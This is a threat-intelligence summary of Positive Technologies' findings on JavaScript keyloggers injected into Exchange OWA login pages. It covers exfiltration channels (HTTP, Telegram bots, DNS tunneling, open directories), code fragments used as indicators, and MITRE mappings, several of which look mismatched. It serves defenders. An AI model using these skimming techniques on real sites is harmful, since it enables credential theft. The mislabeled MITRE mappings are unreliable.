Positive Technologies discovered JavaScript keyloggers injected into Exchange Server authentication pages that either write stolen credentials to local files accessible externally or exfiltrate them directly to external servers (via HTTP requests, Telegram bots, DNS tunneling, headers, or open directories). Analysis found reused, obfuscated code variants collecting credentials, cookies, and User-Agent, with examples of target URLs like /owa/auth/logon.aspx and exfil methods including Telegram and DNS; #ExchangeServer #Telegram
Keypoints
- PT Expert Security Center identified JavaScript keyloggers injected into Exchange Server authentication pages in 2024–2025.
- Two main categories: keyloggers that save data to local server files and those that send data immediately to external servers.
- Local-logging variant writes credentials to files on compromised Exchange servers accessible externally (attackers know file locations).
- Exfiltration methods include POST/GET requests, HTTP headers, JSON bodies, Telegram bots, DNS tunneling, and open directories.
- Malicious code often embedded in or called from the legitimate clkLgn function and frequently obfuscated; variants also steal cookies and User-Agent.
- Target URLs include /owa/auth/lo.aspx, /owa/auth/getidtokens.aspx, /owa/auth/error.aspx, /owa/auth/logon.aspx, and other OWA auth pages.
- Attackers sometimes tag stolen data with organization identifiers and avoid traditional C2 to reduce detection and persistence needs.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – JavaScript injected into Exchange authentication pages executes in the browser to capture credentials (“malicious JavaScript code reads and processes the data from the authentication form”).
- [T1113] Screen Capture – (implied) Collection of additional client-side data such as cookies and User-Agent to augment credential theft (“variant of malicious code collecting victim’s cookie data”).
- [T1078] Valid Accounts – Attackers collect legitimate user credentials via the keylogger to use valid authentication data (“victim visits the Exchange Server authentication page and enters their credentials”).
- [T1041] Exfiltration Over C2 Channel – Data sent directly to external servers, Telegram bots, or services like Discord (“A dedicated server, a Telegram bot… or other legitimate services (such as Discord) can be used”).
- [T1071] Application Layer Protocol – Use of HTTP(S) POST/GET requests and custom headers to transmit stolen data (“data could be sent as parameters in a GET request … or in the body of a POST request” and “Using headers to send user data”).
- [T1048] Exfiltration Over Alternative Protocol – Use of DNS tunneling to exfiltrate encrypted user data as subdomains (“prepare function encrypts user data… and adds it as a subdomain”).
- [T1222] File and Directory Discovery (storage abuse) – Attackers write stolen data to files in open directories on compromised servers for external access (“writes the data to a file on the server… accessible from an external network” and “open directories to store text files containing stolen data”).
Indicators of Compromise
- [URL paths] Compromised Exchange auth pages – /owa/auth/logon.aspx, /owa/auth/getidtokens.aspx (examples of target pages hosting malicious handlers).
- [JavaScript code patterns] Obfuscated fetch/XHR exfiltration – examples include code sending base64-encoded “Aes” parameter via POST and constructs like btoa(aes), and usage of document.getElementById(“username”).value/document.getElementById(“password”).value.
- [Exfiltration channels] Telegram bot identifiers and API usage – messages containing identifiers used to tag stolen credentials (example: Telegram bot usage for sending data).
- [DNS] DNS tunneling subdomain patterns – hex-encoded XOR-encrypted payloads appended as subdomains using key “exchange_default_password” (example: DNS-based exfiltration described).
- [Storage artifacts] Open directory text files – text files in public directories containing collected credentials (example shows stolen data stored in open directories).